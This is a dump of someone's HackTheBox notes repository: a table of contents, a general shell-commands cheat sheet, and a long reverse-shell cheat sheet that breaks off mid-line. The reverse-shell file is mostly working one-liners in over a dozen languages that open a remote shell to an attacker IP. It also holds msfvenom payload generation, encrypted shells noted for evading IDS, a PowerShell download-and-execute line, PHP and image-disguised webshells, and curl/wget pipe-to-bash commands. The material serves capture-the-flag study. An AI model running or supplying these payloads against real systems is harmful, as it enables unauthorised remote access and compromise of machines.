    "content": "# Table of Contents\r\n\r\n| File | Contents |\r\n| ---- | -------- |\r\n| [Active Directory](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Active%20Directory.md) | Bruteforce SMB, Winrm Bruteforce, AD User Enumeration, Mounting Disks, BloodHound, rpcclient |\r\n| [Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Commands.md) | port enum, ports, web enum, Login Bruteforce, sqlinj, File transfer |\r\n| [Docker Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Docker%20Commands.md) | installation, building, pulling, updating, deleting, listing, cheatsheet, run with ports open |\r\n| [Git Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Git%20Commands.md) | clone, commit, push, pull, add, log, deleted file, checkout |\r\n| [Password Cracking](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Password%20Cracking.md) | hashcat, john, hashexamples, zip file cracking |\r\n| [Pivoting](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Pivoting.md) | Post Exploitation, Pivoting, Chisel |\r\n| [Post Exploitation](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/PostExploitationCommands.md) | current user, network info, locate, Antivirus Disabling, registry, privileges, running process, plink, stored credentials, wmic |\r\n| [Regular Commands](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Regular%20Commands.md) | ls, Grep, AWK, Curl, wget, Compression and decompression of files, Find, xclip, Misc, bashLoops, sed, tr, tail, watch |\r\n| [Reverse Shells](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Reverse%20Shell.md) | Bash TCP, Bash UDP, Netcat, Telnet, Socat, Perl, Python, PHP, Ruby, SSL, Powershell, AWK, TCLsh, Java, LUA, MSF Reverse Shells(war, exe, elf, macho, aspx, jsp, python, sh, perl), Xterm, Magicbytes, Exiftool, Simple PHP oneliners |\r\n| [Reversing](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/Reversing.md) | GDB, Radare |"
  },
  {
    "path": "notes/Regular Commands.md",
    "content": "### Post \\ Pre Exploitation\r\n\r\n- [ls](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#ls)\r\n- [Grep](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#grep)\r\n- [AWK](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#awk)\r\n- [Curl](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#curl)\r\n- [wget](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#wget)\r\n- [Compression and decompression of files](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#compressing-and-decompressing)\r\n- [Find](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#find)\r\n- [xclip](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#xclip)\r\n- [Misc](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#misc)\r\n- [bashLoops](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#bash-loops)\r\n- [sed](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#sed)\r\n- [tr](https://github.com/cyberwr3nch/hackthebox/blob/master/notes/commands/Regular%20Commands.md#tr)\r\n- [tail](#tail)\r\n- [watch](#watch)\r\n\r\n\r\n#### ls\r\n```bash\r\n# list files\r\nls\r\n\r\n# list all files, including hidden ones, in long format\r\nls -la\r\n\r\n# list files with human readable sizes\r\nls -sh\r\n```\r\n\r\n#### Grep\r\n```bash\r\n# search recursively for files that contain the phrase password (case-insensitive)\r\ngrep -ir password\r\ngrep -iRl \"password\" ./\r\n\r\n# exclude lines matching any of several strings\r\ngrep -Ev 'exclude1|exclude2' filename.txt\r\n\r\n# keep only lines that start with a lowercase letter\r\ngrep '^[a-z]' users.txt\r\n```\r\n\r\n\r\n#### AWK\r\n```bash\r\n# simple field grab based on spaces; input: damnedsec cyberwr3nch hackthebox\r\nawk '{print $1}' # output: damnedsec\r\n\r\n# custom field separator, obtain only the text between the delimiters\r\n# contents of the file -> user: cyberwr3nch: damnedsec;123\r\nawk -F: '{print $3}' users.txt # output: damnedsec;123\r\n\r\n# print the first field of every line matching the pattern /1/ (single quotes keep $1 away from the shell)\r\nawk -F ':' '/1/ {print $1}'\r\n\r\n# contents of users.txt -> user:[BLACKFIELD764430] rid:[0x451],\r\nawk -F\"[][]\" '{print $2}' users.txt # output: BLACKFIELD764430\r\n\r\n# obtain contents from a specific line\r\n# where x is the line number\r\nawk 'NR==x {print $1}'\r\n\r\n# print lines from a specific line to the end of the file\r\nawk 'NR>x' users.txt\r\n\r\n# omit all the blank lines in a file\r\nawk 'NF'\r\n```\r\n\r\n#### Curl\r\n```bash\r\n# make http, http2, http3 requests with curl\r\ncurl -vv http://10.10.10.10\r\ncurl --http2 http://10.10.10.10\r\ncurl --http3 http://10.10.10.10\r\n\r\n# obtain only the response headers\r\ncurl --head http://10.10.10.10\r\n\r\n# upload a file via curl\r\ncurl --user \"{user}:{creds}\" --upload-file <file> \"http://10.10.10.10/upload_location\"\r\n\r\n# save the output to a file\r\ncurl http://10.10.10.10 -o index.html\r\n\r\n# pipe a fetched script straight into bash (linpeas.sh or linenum.sh)\r\ncurl http://10.10.10.10:<port_no>/lin(peas\\|enum).sh | bash\r\n```\r\n\r\n#### Wget\r\n```bash\r\n# download files with wget\r\nwget http://10.10.10.10/xxx.sh\r\n\r\n# run a script without saving it: -O - writes it to stdout, which is piped to bash\r\nwget -qO - http://10.10.10.11:<port_no>/lin(peas\\|enum).sh | bash\r\n```\r\n\r\n#### SED\r\n```bash\r\n# search and replace strings\r\ncat username.txt | sed s/{stringToBeChanged}/{replacementString}/g\r\n\r\n# delete a trailing ',' at the end of each line\r\ncat usernames.txt | sed s/,$//\r\n\r\n# prefix every two characters with \\x: '..' matches two characters and '&' re-inserts the match, so '\\x&' adds \\x without deleting them\r\ncat hexpayload.txt | sed 's/../\\\\x&/g'\r\n\r\n# edit a file in place: replace a trailing ',' with ']' on every line of intel_update.log\r\nsed -i 's/,$/\\]/' intel_update.log\r\n\r\n# replace a trailing ',' with ']' only on the last line of the file\r\n# the $ before s/,$/\\]/ addresses the last line of the file\r\nsed -i '$ s/,$/\\]/' intel_update.log\r\n\r\n# delete empty lines in a file\r\ncat test.txt | sed -r '/^\\s*$/d'\r\n\r\n# use -i when the file itself should be modified; without it the result goes to stdout only\r\n# use -r for extended regular expressions (such as \\s above)\r\n```\r\n\r\n#### tr\r\n```bash\r\n# translate newlines '\\n' into ','; handy for building comma-separated lists (e.g. ports for nmap)\r\ncat usernames.txt | tr '\\n' ','\r\n```\r\n\r\n\r\n#### Find\r\n```bash\r\n# find by file name\r\nfind . -name user.txt\r\n\r\n# find and execute a command on each match\r\nfind . -name '*.txt' -exec cat \"{}\" \\;\r\n\r\n# {} is the placeholder for each matched path, passed to the command as an argument\r\n# find directories with the specified name and execute the command\r\nfind . -type d -name uploads -exec rm -rf \"{}\" ';'\r\n\r\n# find and copy files\r\nfind -name 'file.ext' -exec cp \"{}\" <copy_path> \\;\r\n\r\n# find recently modified files\r\n# maxdepth - how deep to descend into sub directories, newermt - modified after the given timestamp\r\nfind . -maxdepth 1 -newermt \"2016-12-06\"\r\n\r\n# find files containing a specific string\r\nfind . -type f -print0 | xargs -0 grep -niH -e \"your common word to search\"\r\n```\r\n\r\n#### Compressing and Decompressing\r\n```bash\r\n# zip a folder with its contents\r\nzip -r -9 html.zip /var/www/html\r\n\r\n# unzip a zip file\r\nunzip html.zip\r\n\r\n# tar a folder\r\ntar cvf html.tar html/\r\n\r\n# extract a .tar file\r\ntar -xvf html.tar\r\n\r\n# tar.gz a folder\r\ntar cvfz html.tar.gz html/\r\n\r\n# extract a *.tar.gz file\r\ntar -xzvf html.tar.gz\r\n\r\n# extract a rar file\r\nunrar x html.rar\r\n```\r\n\r\n#### Xclip\r\n```bash\r\n# installation\r\nsudo apt-get install xclip\r\n\r\n# copy the contents of a file to the primary selection (paste with the middle mouse button)\r\ncat user.txt | xclip\r\n\r\n# copy to the clipboard selection (paste with ctrl + v)\r\ncat user.txt | xclip -sel clip\r\ncat user.txt | xclip -selection clipboard\r\n\r\n# copy the contents to the primary selection explicitly\r\ncat user.txt | xclip -selection primary\r\n```\r\n\r\n#### Misc\r\n```bash\r\n# monitor: repeat the same command periodically\r\n# ls -la every 1 sec on a dir\r\nwatch -n 1 'ls -la'\r\n```\r\n\r\n#### Bash Loops\r\n```bash\r\n# for loop that wraps each line of the file in payload += b'...'\r\nfor i in $(cat hexdata); do echo \"payload += b'$i'\"; done\r\n```\r\n\r\n#### Tail <a name='tail'></a>\r\n```bash\r\n# view only the last line of the file\r\ntail -1 <file>\r\n\r\n# view the last 7 lines of the file\r\ntail -n7 <file>\r\n\r\n# start output at a given line instead of counting from the end\r\ntail -n +7 <file> # prints from line 7 onwards, i.e. skips the first six lines\r\n\r\n# follow the file and print new lines as they are appended\r\ntail -f <file>\r\n```\r\n\r\n#### Watch <a name='watch'></a>\r\n```bash\r\n# repeat executing the command\r\nwatch <command>\r\n\r\n# execute the command at a specific interval\r\nwatch -n <seconds> <command>\r\n\r\n# highlight the differences between successive executions ## Thanks copycookie.com\r\nwatch -n <seconds> -d <command>\r\n\r\n# exit when the output changes\r\nwatch -g <command>\r\n```\r\n"
  },
  {
    "path": "notes/Reverse Shell.md",
    "content": "# Reverse Shells\n\n### Reverse Shells\n\n- [Bash TCP](#basht)\n- [Bash UDP](#bashu)\n- [Netcat](#nc)\n- [NCat](#ncat)\n- [Telnet](#tn)\n- [Socat](#scat)\n- [Perl](#perl)\n- [Python](#py)\n- [PHP](#php)\n- [Ruby](#rb)\n- [Secure Reverse Shell](#ssl)\n- [Powershell](#ps)\n- [AWK](#awk)\n- [TCLsh](#tsh)\n- [Java](#java)\n- [Lua](#lua)\n- [MSF Reverse Shell](#msf)\n- [XTerm](#xt)\n- [Magic Bytes](#image)\n\n#### Bash TCP <a name='basht'></a>\n```bash\n# on the victim machine\n# 1.syntax: bash -i >& /dev/tcp/{attacker IP}/{port} 0>&1\nbash -i >& /dev/tcp/10.10.14.32/1337 0>&1\n\n# 2.syntax: /bin/bash/ -i > dev/tcp/{attacker IP}/{port} 0<& 2>&1\n/bin/bash -i > /dev/tcp/10.10.14.32/1337 0<& 2>&1\n\n# 3.syntax: exec 5<>/dev/tcp/{attacker IP}/{port};cat <&5 | while read line; do $line 2>&5 >&5; done\nexec 5<>/dev/tcp/10.10.14.32/1337;cat <&5 | while read line; do $line 2>&5 >&5; done\n\n# 4.syntax: exec /bin/sh 0</dev/tcp/{attacker IP}/{port} 1>&0 2>&0\nexec /bin/sh 0</dev/tcp/10.10.14.32/1337 1>&0 2>&0\n\n# 5.syntax: 0<&196;exec 196<>/dev/tcp/{attacker IP}/{port}; sh <&196 >&196 2>&196\n0<&196;exec 196<>/dev/tcp/10.10.14.32/1337; sh <&196 >&196 2>&196\n\n# on attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Bash UDP <a name='bashu'></a>\n```bash \n# on the victim machine\n# syntax: sh -i >& /dev/udp/{attacker IP}/{port} 0>&1\nsh -i >& /dev/udp/10.10.14.32/1337 0>&1\n\n# on attacker machine\n# syntax: nc -u -lvp {port}\nnc -u -lvp 1337\n```\n\n#### NetCat <a name='nc'></a>\n```bash\n# 1.syntax: nc -e /bin/sh {attacker IP} {port}\nnc -e /bin/bash 10.10.14.32 1337\n\n# 2.syntax: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {attacker IP} {port} >/tmp/f\nrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.32 1337 >/tmp/f\n\n# 3.syntax: mknod backpipe p && nc {attacker IP} {port} 0<backpipe | /bin/bash 1>backpipe\nmknod backpipe p && nc 10.10.14.32 1337 0<backpipe | /bin/bash 1>backpipe\n\n# on the attacker machine\n# 
syntax: nc -lvnp {port}\nnc -lvnp 1337 \n```\n\n#### NCat <a name='ncat'></a>\n```bash\n# on the victim machine\n# 1.TCP Syntax: ncat {attacker IP} {port} -e /bin/bash\nncat 10.10.14.32 1337 -e /bin/bash\n\n# 2.UDP Syntax: ncat --udp {attacker IP} {port} -e /bin/bash\nncat --udp 10.10.14.32 1337 -e /bin/bash\n\n# on the attacker machine\n# 1.TCP Listen syntax: ncat -l {port}\nncat -l 1337\n\n# 2.UDP Listen syntax: ncat -u {port}\nncat -u 1337\n```\n\n#### Telnet <a name='tn'></a>\n```bash\n# on the victim machine\n# 1.syntax: rm -f /tmp/p; mknod /tmp/p p && telnet {attacker IP} {port} 0/tmp/p 2>&1\nrm -f /tmp/p; mknod /tmp/p p && telnet 10.10.14.32 1337 0/tmp/p 2>&1\n\n# 2.syntax: telnet {attacker IP} {port1} | /bin/bash | telnet {attacker IP} {port2}\ntelnet 10.10.14.32 1337 | /bin/bash | telnet 10.10.14.32 1338\n\n# 3.syntax: rm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet {attacker IP} {port} > f\nrm f;mkfifo f;cat f|/bin/sh -i 2>&1|telnet 10.10.14.32 1337 > f\n\n# on the attacker machine\n# 1.syntax: nc -lvnp {port}\nnc -lvnp 1337\n\n# 2.syntax: nc -lvnp {port1}; nc -lvnp {port 2}\nnc -lvnp 1337\nnc -lvnp 1338\n```\n\n#### Socat <a name='scat'></a>\n```bash\n# on the attacker machine\n# syntax: socat file:`tty`,raw,echo=0 TCP-L:{port}\nsocat file:`tty`,raw,echo=0 TCP-L:1337\n\n# on the victm machine\n# 1.syntax: ./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{attacker IP}:{port}\n./socat tcp:<attacker-ip>:<attacker-port> exec:'bash -li',pty,stderr,setsid,sigint,sane \n\n# 2.syntax: socat tcp-connect:{attacker IP}:{port} exec:\"bash -li\",pty,stderr,setsid,sigint,sane\nsocat tcp-connect:10.10.14.32:1337 exec:\"bash -li\",pty,stderr,setsid,sigint,sane\n\n# 3.Oneliner syntax: wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:{attacker IP}:{port}\nwget -q 
https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.14.32:1337\n\n#============================================================================#\n# simple reverese shell\n# on the compromised machine\nsocat TCP-L:<port> EXEC=/bin/bash # execute /bin/bash on conenction\n\n# on the attacker machine\nsocat TCP:<compromised-machine-ip>:<opened-port> - \n\n# \n\n\n# Pivoting with socat\n# machine we want to access (Machine A)\nsocat TCP-L:1234 EXEC:/bin/bash\n\n# machine we have access to (pivot point- Machine B)\nsocat TCP-L:3333 TCP:<Machine-A IP>:1234 \n\n# attacker machine  (our machine)\nsocat TCP:<Machine-B IP>:3333 - \n\n# encrypted reverse shells will prevent anyone from spying and used to evade IDS\n\n# On the attacker machine\n## Generate a certificate\nopenssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.cert \n# on creating values will be asked which can be left blank\n# shell.key and shell.cert will be generated\n# merge the key and cert file to generate a pam file\ncat shell.key shell.crt > shell.pem\n# the generated certificate must be used on whichever device is listening for the connection\nsocat openssl-listen:4444,cert=shell.pem,verify=0 -\n\n# on the victim machine\nsocat openssl-connect:<attacker-ip>:4444,verify=0 EXEC:/bin/bash\n\n# poor interactive shell will be obtained\n\n```bash\n# compromized machine\n┌───[toor@parrot]─[/dev/shm]  \n└──╼ $socat openssl-listen:1234,cert=shell.pem,verify=0 exec:/bin/bash\n```\n\n```bash\n# attackker machine  \n┌────[kali@kali]─[/opt/binaries]\n└──╼ $socat openssl-connect:192.168.43.181:1234,verify=0 -\nid\nuid=1000(toor) gid=1000(toor) groups=1000(toor)\n\n\n# =================================================================================================#\n# fully interactive encrypted shell\n# on the attacker machine\nsocat `tty`,raw,echo=0 
openssl-listen:1234,cert=shell.pem,verify=0\n\n# on the victim machine\nsocat openssl-connect:<attacker-ip>:1234,verify=0 exec:bash,pty,stderr,setsid\n```\n\n#### Perl <a name='perl'></a>\n```bash \n# on the victim machine\n# 1.syntax: perl -e 'use Socket;$i=\"{attacker IP}\";$p={port};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\nperl -e 'use Socket;$i=\"10.10.14.32\";$p=1337;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'\n\n# 2.syntax: perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{attacker IP}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\nperl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"10.10.14.32:1337\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n\n# 3. 
Works only on windows machine: perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"{attacker IP}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\nperl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"10.10.14.32:1337\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'\n\n# on the attacker machine \n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n\n```\n\n#### Python <a name='py'></a>\n```bash\n# on the victim machine\n# IPv4 Connection: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"{attacker IP}\",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\npython -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.14.32\",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(\"/bin/bash\")'\n\n# IPv6 Connection: python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"{IPv6 attacker IP}\",{port},0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn(\"/bin/sh\");'\npython -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((\"dead:beef:2::125c\",1337,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn(\"/bin/sh\");'\n\n# on the attacker machine\n# 1.syntax: nc -lvnp {port}\nnc -lvnp 1337\n\n# 2.IPv6 Connection Listenting: wget http://ftp.cn.debian.org/debian/pool/main/n/nc6/netcat6_1.0-8_amd64.deb; dpkg -i ./netcat6_1.0-8_amd64.deb; netcat -6 -l {port}  \nwget http://ftp.cn.debian.org/debian/pool/main/n/nc6/netcat6_1.0-8_amd64.deb; dpkg -i ./netcat6_1.0-8_amd64.deb; netcat -6 -l 1337\n```\n\n#### PHP <a name='php'></a>\n```bash\n# on the victim machine\n# 1.syntax: php -r '$sock=fsockopen(\"{attacker IP}\",{port});exec(\"/bin/sh -i <&3 >&3 2>&3\");'\nphp -r 
'$sock=fsockopen(\"10.10.14.32\",1337);exec(\"/bin/sh -i <&3 >&3 2>&3\");'\n\n# 2.syntax: php -r '$s=fsockopen(\"{attacker IP}\",{port});$proc=proc_open(\"/bin/sh -i\", array(0=>$s, 1=>$s, 2=>$s),$pipes);'\nphp -r '$s=fsockopen(\"10.10.14.32\",1337);$proc=proc_open(\"/bin/sh -i\", array(0=>$s, 1=>$s, 2=>$s),$pipes);'\n\n# 3.Syntax: <?php system($_GET['wr3nch']); ?>\n<php system($_GET['wr3nch']); >\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Ruby <a name='rb'></a>\n```bash\n# on the victim machine\n# 1.syntax: ruby -rsocket -e'f=TCPSocket.open(\"{attacker IP}\",{port}).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\nruby -rsocket -e'f=TCPSocket.open(\"10.10.14.32\",1337).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'\n\n# 2.Windows Only Syntax: ruby -rsocket -e 'c=TCPSocket.new(\"{attacker IP}\",\"{port}\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\nruby -rsocket -e 'c=TCPSocket.new(\"10.10.14.32\",\"1337\");while(cmd=c.gets);IO.popen(cmd,\"r\"){|io|c.print io.read}end'\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Secure Reverse Shell <a name='ssl'></a>\n```bash\n# on the victim machine\n# syntax: mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {attacker IP}:{port} > /tmp/s; rm /tmp/s\nmkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 10.10.14.32:1337 > /tmp/s; rm /tmp/s\n\n# on the attacker machine\n# Generating ssl cert and key\nopenssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes\n# configuring on the specified port and listenting\n# syntax: openssl s_server -quiet -key key.pem -cert cert.pem -port {port}\nopenssl s_server -quiet -key key.pem -cert cert.pem -port 1337\n# or ncat instance \n# syntax: ncat --ssl -vv -l -p {port}\nncat --ssl -vv -l -p 1337\n```\n\n#### Powershell <a name='ps'></a>\n```bash\n# on the victim machine\n# 1.syntax: powershell -NoP -NonI -W 
Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"{attacker IP}\",{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\npowershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(\"10.10.14.32\",1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + \"PS \" + (pwd).Path + \"> \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\n\n# 2.Syntax: powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('{attacker IP}',{port});$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\npowershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('10.10.14.32',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + 
(pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"\n\n# 3. Modify the IP in this file and replace share it to the victim\npowershell IEX (New-Object Net.WebClient).DownloadString('https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1')\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### AWK <a name='awk'></a>\n```bash\n# on the victim machine\n# syntax: awk 'BEGIN {s = \"/inet/tcp/0/{attacker IP}/{port}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\nawk 'BEGIN {s = \"/inet/tcp/0/10.10.14.32/1337\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### TCLsh <a name='tsh'></a>\n```bash\n# on the victim machine\n# syntax: echo 'set s [socket {attacker IP} {port}];while 42 { puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh\necho 'set s [socket 10.10.14.32 1337];while 42 { puts -nonewline $s \"shell>\";flush $s;gets $s c;set e \"exec $c\";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Java <a name='java'></a>\n```bash\n# on the victim machine\n# syntax: r = Runtime.getRuntime()\n# p = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/{attacker IP}/{port};cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\n# p.waitFor()\nr = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 
5<>/dev/tcp/10.10.14.32/1337;cat <&5 | while read line; do \\$line 2>&5 >&5; done\"] as String[])\np.waitFor()\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### Lua <a name='lua'></a>\n```bash\n# on the victim machine\n# 1.Only On Linux syntax: lua -e \"require('socket');require('os');t=socket.tcp();t:connect('{attacker IP}','{port}');os.execute('/bin/sh -i <&3 >&3 2>&3');\"\nlua -e \"require('socket');require('os');t=socket.tcp();t:connect('10.10.14.32','1337');os.execute('/bin/sh -i <&3 >&3 2>&3');\"\n\n# 2.On Both linux and windows:lua5.1 -e 'local host, port = \"{attacker IP}\", {port} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()' \nlua5.1 -e 'local host, port = \"10.10.14.32\", 1337 local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()'\n\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### MSF Reverse Shell<a name='msf'></a>\n```bash\n# on the attacker machine to generate files which will yield shell rather than msf session\n# transfer the generated file to the victim machine in order to obtain the shell, change the IP and Port \n\n# war file\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.32 LPORT=1337 -f war > reverse.war\n\n# exe file\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.32 LPORT=1337 -f exe > reverse.exe\n\n# elf file\nmsfvenom -p linux/x86/shell_reverse_tcp LHOST=10.10.14.32 LPORT=1337 -f elf >reverse.elf\n\n# macho file\nmsfvenom -p linux/x86/shell_reverse_tcp 
LHOST=10.10.14.32 LPORT=1337 -f elf >reverse.elf\n\n# aspx file\nmsfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.32 LPORT=1337 -f aspx > exploit.aspx\n\n# jsp file\nmsfvenom -p java/jsp_shell_reverse_tcp LHOST=\"10.10.14.32\" LPORT=1337 -f raw > shell.jsp\n\n# python file\nmsfvenom -p cmd/unix/reverse_python LHOST=\"10.10.14.32\" LPORT=1337 -f raw > shell.py\n\n# sh file\nmsfvenom -p cmd/unix/reverse_bash LHOST=\"10.10.14.32\" LPORT=1337 -f raw > shell.sh\n\n# perl file\nmsfvenom -p cmd/unix/reverse_perl LHOST=\"10.10.14.32\" LPORT=1337 -f raw > shell.pl\n\n# after transferring\n# on the attacker machine\n# syntax: nc -lvnp {port}\nnc -lvnp 1337\n```\n\n#### XTerm <a name='xt'></a>\n```bash\n# on the victim machine\nxterm -display 10.10.14.32:1\nXnest :1\nxhost +targetip\n\n# on the attacker machine \nnc -lvnp 6001\n```\n\n#### Magic Bytes reverse shell <a name='image'></a>\n```bash\n# Using magic bytes\necho 'FFD8FFDB' | xxd -r -p > webshell.php.jpg\necho '<?=`$_GET[wr3nch]`?>' >> 